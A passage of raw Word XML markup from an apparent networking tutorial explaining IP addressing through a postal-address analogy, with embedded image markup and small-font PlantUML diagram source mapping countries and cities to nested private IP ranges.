        <w:t>. Every device that communicates on a network needs a unique identifier - an IP address. It serves as the fundamental addressing mechanism that enables data to be routed from source to destination across interconnected networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BB3DD3" w14:textId="2B4E03A0" w:rsidR="009D1C68" w:rsidRPr="00087B8D" w:rsidRDefault="009D1C68" w:rsidP="00087B8D">
      <w:r w:rsidRPr="009D1C68">
        <w:t>OSI Layer: Network (Layer 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F6EDFC" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00672E5B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00087B8D">
        <w:t>How It Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79148D8C" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
      <w:r w:rsidRPr="00087B8D">
        <w:t>IP addressing operates like a postal address system for the digital world:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24872C20" w14:textId="35A85E7F" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00672E5B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="00087B8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Unique </w:t>
      </w:r>
      <w:r w:rsidR="00672E5B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00087B8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dentification</w:t>
      </w:r>
      <w:r w:rsidRPr="00087B8D">
        <w:t xml:space="preserve">: Each device receives a </w:t>
      </w:r>
      <w:r w:rsidRPr="00087B8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>unique</w:t>
      </w:r>
      <w:r w:rsidRPr="00087B8D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00087B8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00087B8D">
        <w:t xml:space="preserve"> address within its network segment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B48031" w14:textId="186C9F2B" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00672E5B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="00087B8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Hierarchical </w:t>
      </w:r>
      <w:r w:rsidR="00672E5B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00087B8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tructure</w:t>
      </w:r>
      <w:r w:rsidRPr="00087B8D">
        <w:t xml:space="preserve">: Addresses are organized in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00087B8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hierarchy</w:t>
      </w:r>
      <w:r w:rsidRPr="00087B8D">
        <w:t xml:space="preserve"> (network → subnet → host)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A6DD52" w14:textId="4959CB4E" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00672E5B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="00087B8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Routing </w:t>
      </w:r>
      <w:r w:rsidR="00672E5B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="00087B8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ecision</w:t>
      </w:r>
      <w:r w:rsidRPr="00087B8D">
        <w:t>: Routers examine destination IP addresses to determine the next hop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37858701" w14:textId="6DCAE12C" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00672E5B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="00087B8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Packet </w:t>
      </w:r>
      <w:r w:rsidR="00672E5B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="00087B8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>elivery</w:t>
      </w:r>
      <w:r w:rsidRPr="00087B8D">
        <w:t>: Data packets are forwarded hop-by-hop until they reach the destination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E5D830" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00672E5B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00087B8D">
        <w:t>Real-World Analogy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA37DCF" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
      <w:r w:rsidRPr="00087B8D">
        <w:t xml:space="preserve">IP addresses are like </w:t>
      </w:r>
      <w:r w:rsidRPr="00087B8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>postal addresses</w:t>
      </w:r>
      <w:r w:rsidRPr="00087B8D">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241E35E8" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00672E5B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00672E5B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Street Address</w:t>
      </w:r>
      <w:r w:rsidRPr="00087B8D">
        <w:t>: Identifies specific house (host address)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3606D89A" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00672E5B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00672E5B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>City/State</w:t>
      </w:r>
      <w:r w:rsidRPr="00087B8D">
        <w:t>: Identifies general area (network address)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D26A2B9" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00672E5B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00672E5B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Country</w:t>
      </w:r>
      <w:r w:rsidRPr="00087B8D">
        <w:t>: Highest level organization (major network)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226A91FF" w14:textId="05694CB0" w:rsidR="004F31B7" w:rsidRPr="00087B8D" w:rsidRDefault="004F31B7" w:rsidP="004F31B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00672E5B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Postal Code</w:t>
      </w:r>
      <w:r w:rsidRPr="00087B8D">
        <w:t>: Helps route mail efficiently (subnet)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3D8D90" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
      <w:r w:rsidRPr="00087B8D">
        <w:t>Just as mail carriers use postal addresses to deliver letters, routers use IP addresses to deliver data pac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8"/>
        <w:gridCol w:w="918"/>
      </w:tblGrid>
      <w:tr w:rsidR="00087B8D" w14:paraId="7A408FC9" w14:textId="77777777" w:rsidTr="00672E5B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16578" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6980FD3A" w14:textId="0C83323F" w:rsidR="00087B8D" w:rsidRDefault="00672E5B" w:rsidP="00087B8D">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="032AE5F5" wp14:editId="6BB395EE">
                  <wp:extent cx="9414345" cy="6191239"/>
                  <wp:effectExtent l="0" t="0" r="0" b="635"/>
                  <wp:docPr id="612565984"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6385" cy="6199157"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="918" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AD8851F" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00087B8D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>@startuml IP_Address_Analogy</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F77E442" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="757C8453" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00087B8D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>title IP Address vs Postal Address Analogy</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44ED67E0" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="62B6E2CD" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00087B8D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>package "Postal System" {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D27B7EE" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00087B8D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "Country: USA" as country {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17C7D6B1" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00087B8D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "State: California" as state {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="688404BD" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00087B8D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">      rectangle "City: San Francisco" as city {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BB6A898" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00087B8D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">        rectangle "Street: 123 Main St" as street</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="196E9235" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00087B8D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">      }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41EBBD91" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00087B8D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BD43401" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00087B8D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66DBB30C" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00087B8D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1570C567" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2251C56E" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00087B8D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>package "IP Network System" {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="360FCB9A" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00087B8D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "Major Network: 10.0.0.0/8" as major {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1702A718" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00087B8D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "Regional Network: 10.1.0.0/16" as regional {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BD0F685" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00087B8D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">      rectangle "Local Network: 10.1.1.0/24" as local {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A8E2BFF" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00087B8D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">        rectangle "Host: 10.1.1.100" as host</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B3AD41E" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00087B8D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">      }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AE84DC0" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00087B8D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CFBAA33" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00087B8D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DBD2C22" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00087B8D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D530ABD" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="55CFCE33" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00087B8D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>country -[hidden]-&gt; major</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="202656B1" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00087B8D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>state -[hidden]-&gt; regional</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79D887CF" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00087B8D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>city -[hidden]-&gt; local</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02DF034B" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00087B8D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>street -[hidden]-&gt; host</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="408E07B9" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="23CB15E2" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00087B8D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note right of country : Identifies broad geographic area</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41134922" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00087B8D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note right of major : Identifies major network block</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BE96283" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6375082A" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00087B8D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note right of state : Identifies specific region</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BC72587" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00087B8D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note right of regional : Identifies campus/organization</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41F75F98" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4A1B22DC" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00087B8D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note right of city : Identifies local area</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E152732" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00087B8D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note right of local : Identifies subnet/VLAN</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C8D5166" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3478A4A6" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00087B8D">
              <w:rPr>
